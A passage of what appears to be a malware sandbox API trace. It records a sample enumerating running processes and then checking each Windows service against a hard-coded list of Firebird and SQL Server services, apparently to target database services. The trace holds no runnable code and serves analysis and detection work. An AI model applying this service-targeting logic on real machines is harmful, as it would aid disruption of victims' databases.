th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0155.084] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0155.084] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0155.085] lstrlenW (lpString="Memory Compression") returned 18 [0155.085] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0155.086] lstrlenW (lpString="sihost.exe") returned 10 [0155.086] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.087] lstrlenW (lpString="svchost.exe") returned 11 [0155.087] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0155.087] lstrlenW (lpString="msoia.exe") returned 9 [0155.087] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0155.088] lstrlenW (lpString="taskhostw.exe") returned 13 [0155.088] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0155.088] lstrlenW (lpString="explorer.exe") returned 12 [0155.088] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0155.089] lstrlenW (lpString="SearchUI.exe") returned 12 [0155.089] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0155.102] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0155.102] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0155.103] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0155.103] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0155.104] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0155.104] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0155.104] lstrlenW (lpString="mobsync.exe") returned 11 [0155.104] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0155.105] lstrlenW (lpString="hgaibc.exe") returned 10 [0155.105] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0155.106] lstrlenW (lpString="hgaibc.exe") returned 10 [0155.106] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0155.107] lstrlenW (lpString="cmd.exe") returned 7 [0155.107] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0155.108] lstrlenW (lpString="conhost.exe") returned 11 [0155.108] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0155.108] CloseHandle (hObject=0x2dc) returned 1 [0155.108] Sleep (dwMilliseconds=0x1f4) [0155.780] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6ddf20 [0155.780] EnumServicesStatusExW (in: hSCManager=0x6ddf20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0155.781] GetLastError () returned 0xea [0155.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1bc4) returned 0x4503078 [0155.781] EnumServicesStatusExW (in: hSCManager=0x6ddf20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4503078, cbBufSize=0x1bc4, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4503078, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0155.782] CloseServiceHandle (hSCObject=0x6ddf20) returned 1 [0155.782] lstrlenW (lpString="AppXSvc") returned 7 [0155.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0155.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0155.782] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0155.782] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0155.782] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0155.782] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0155.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0155.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0155.782] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0155.782] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0155.782] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0155.782] lstrlenW (lpString="Audiosrv") returned 8 [0155.782] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0155.782] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0155.782] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0155.783] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0155.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0155.783] lstrlenW (lpString="BFE") returned 3 [0155.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0155.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0155.783] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0155.783] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0155.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0155.783] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0155.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0155.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0155.783] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0155.783] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0155.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0155.783] lstrlenW (lpString="CDPSvc") returned 6 [0155.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0155.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0155.783] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0155.783] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0155.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0155.783] lstrlenW (lpString="ClickToRunSvc") returned 13 [0155.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0155.783] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0155.783] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0155.783] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0155.783] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0155.783] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0155.783] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0155.784] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0155.784] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0155.784] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0155.784] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0155.784] lstrlenW (lpString="CryptSvc") returned 8 [0155.784] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0155.784] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0155.784] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0155.784] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0155.784] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0155.784] lstrlenW (lpString="DcomLaunch") returned 10 [0155.784] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0155.784] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0155.784] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0155.784] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0155.784] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0155.784] lstrlenW (lpString="DeviceAssociationService") returned 24 [0155.784] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0155.784] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0155.784] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0155.784] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0155.784] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0155.784] lstrlenW (lpString="Dhcp") returned 4 [0155.784] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0155.784] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0155.784] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0155.784] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0155.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0155.785] lstrlenW (lpString="Dnscache") returned 8 [0155.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0155.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0155.785] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0155.785] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0155.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0155.785] lstrlenW (lpString="DPS") returned 3 [0155.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0155.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0155.785] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0155.785] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0155.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0155.785] lstrlenW (lpString="DusmSvc") returned 7 [0155.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0155.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0155.785] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0155.785] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0155.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0155.785] lstrlenW (lpString="EventLog") returned 8 [0155.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0155.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0155.785] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0155.785] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0155.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0155.785] lstrlenW (lpString="EventSystem") returned 11 [0155.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0155.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0155.786] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0155.786] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0155.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0155.786] lstrlenW (lpString="FontCache") returned 9 [0155.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0155.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0155.786] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0155.786] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0155.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0155.786] lstrlenW (lpString="gpsvc") returned 5 [0155.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0155.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0155.786] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0155.786] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0155.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0155.786] lstrlenW (lpString="iphlpsvc") returned 8 [0155.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0155.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0155.786] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0155.786] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0155.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0155.786] lstrlenW (lpString="KeyIso") returned 6 [0155.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0155.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0155.786] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0155.786] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0155.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0155.787] lstrlenW (lpString="LanmanServer") returned 12 [0155.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0155.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0155.787] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0155.787] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0155.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0155.787] lstrlenW (lpString="LanmanWorkstation") returned 17 [0155.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0155.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0155.787] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0155.787] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0155.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0155.787] lstrlenW (lpString="lfsvc") returned 5 [0155.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0155.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0155.788] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0155.788] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0155.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0155.788] lstrlenW (lpString="lmhosts") returned 7 [0155.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0155.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0155.788] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0155.788] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0155.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0155.788] lstrlenW (lpString="LSM") returned 3 [0155.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0155.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0155.788] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0155.788] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0155.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0155.788] lstrlenW (lpString="MpsSvc") returned 6 [0155.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0155.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0155.788] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0155.788] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0155.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0155.788] lstrlenW (lpString="NcbService") returned 10 [0155.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0155.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0155.788] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0155.788] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0155.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0155.789] lstrlenW (lpString="netprofm") returned 8 [0155.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0155.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0155.789] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0155.789] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0155.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0155.789] lstrlenW (lpString="NgcSvc") returned 6 [0155.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0155.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0155.789] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0155.789] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0155.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0155.789] lstrlenW (lpString="NlaSvc") returned 6 [0155.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0155.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0155.789] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0155.789] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0155.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0155.789] lstrlenW (lpString="nsi") returned 3 [0155.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0155.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0155.789] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0155.789] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0155.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0155.789] lstrlenW (lpString="PcaSvc") returned 6 [0155.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0155.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0155.789] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0155.789] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0155.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0155.790] lstrlenW (lpString="PlugPlay") returned 8 [0155.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0155.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0155.790] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0155.790] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0155.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0155.790] lstrlenW (lpString="Power") returned 5 [0155.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0155.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0155.790] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0155.790] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0155.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0155.790] lstrlenW (lpString="ProfSvc") returned 7 [0155.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0155.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0155.790] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0155.790] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0155.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0155.790] lstrlenW (lpString="RpcEptMapper") returned 12 [0155.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0155.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0155.790] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0155.790] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0155.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0155.790] lstrlenW (lpString="RpcSs") returned 5 [0155.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0155.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0155.791] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0155.791] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0155.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0155.791] lstrlenW (lpString="SamSs") returned 5 [0155.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0155.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0155.791] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0155.791] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0155.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0155.791] lstrlenW (lpString="Schedule") returned 8 [0155.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0155.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0155.791] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0155.791] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0155.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0155.791] lstrlenW (lpString="SecurityHealthService") returned 21 [0155.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 